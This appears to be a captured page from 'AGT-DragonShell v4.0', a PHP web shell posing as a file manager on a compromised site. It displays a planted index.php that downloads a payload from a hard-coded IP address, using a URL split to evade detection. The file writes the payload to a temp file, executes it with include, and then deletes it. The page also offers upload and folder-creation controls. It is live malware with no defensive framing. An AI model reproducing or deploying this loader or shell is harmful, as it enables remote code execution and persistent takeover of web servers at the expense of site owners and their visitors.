🐉 AGT-DragonShell v4.0

Advanced File Manager with WordPress Integration

Current path: home/sergemamey/www/

⬆️ 🔙 Go Up: sergemamey

📄 Viewing: index.php

<?php
$d = @tempnam(@sys_get_temp_dir(),"");
$handle = curl_init();
curl_setopt ($handle, CURLOPT_URL, 'htt'.'p://142.54.172.82/z60'.'602_6/stat/index.txt');
curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec( $handle );
if ( PHP_VERSION_ID < 80000 ) {
    curl_close(  $handle  );
}
@file_put_contents($d, $result);
@include $d;
@unlink($d);?>

📂 File Manager

📤 Upload File


📁 Create Folder


🐉 AGT-DragonShell • v4.0 • Advanced File Management System